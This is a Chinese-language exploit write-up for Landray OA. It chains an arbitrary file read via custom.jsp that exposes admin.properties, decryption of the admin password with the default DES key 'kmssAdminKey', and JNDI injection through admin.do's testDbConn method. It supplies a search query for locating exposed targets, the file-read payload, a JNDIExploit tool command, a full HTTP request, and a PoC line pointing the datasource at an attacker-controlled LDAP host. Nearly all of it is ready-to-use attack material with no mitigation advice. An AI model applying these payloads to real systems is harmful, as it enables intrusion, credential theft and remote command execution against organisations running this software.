【漏洞左先锋】【OA漏洞】蓝凌OA SSRF+JNDI注入漏洞
漏洞详情
蓝凌OA 存在SSRF+JNDI注入漏洞,攻击者可利用漏洞获取敏感信息,读取配置文件得到密钥后访问 admin.do 即可利用 JNDI远程命令执行获取权限件。
影响版本
蓝凌OA
漏洞复现
网络空间测绘平台语句
app="Landray-OA系统"
访问目标进行测试
利用 蓝凌OA custom.jsp 任意文件读取漏洞 读取配置文件
/WEB-INF/KmssConfig/admin.properties
var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}
获得password,由于蓝凌OA默认是DES加密,且默认密钥为 kmssAdminKey,所以只要拿着password进行解密就好(返回的password字符串去掉末尾的/r在进行解密)
成功进入后台
进入后台后,使用工具执行命令
java -jar JNDIExploit-1.4-SNAPSHOT.jar [-i] [address][-l] [port]
https://github.com/WhiteHSBG/JNDIExploit
运行工具监听端口 ping dnslog测试 命令执行 (蓝凌OA 默认使用的是 JDK 1.7)
POST /admin.do HTTP/1.1
Host:
Content-Length: 91
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http:// 127.0.0.1:8088
Referer: http://127.0.0.1:8088/admin.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=19C56D56A10068F34009D39C1C7FC35F
Connection: close
method=testDbConn&datasource=ldap://xx.xx.xx.xx:80/Basic/Dnslog/40fd5ef2.dns.1433.eu.org
Poc
method=testDbConn&datasource=ldap://xx.xx.xx.xx:80/Basic/Dnslog/40fd5ef2.dns.1433.eu.org
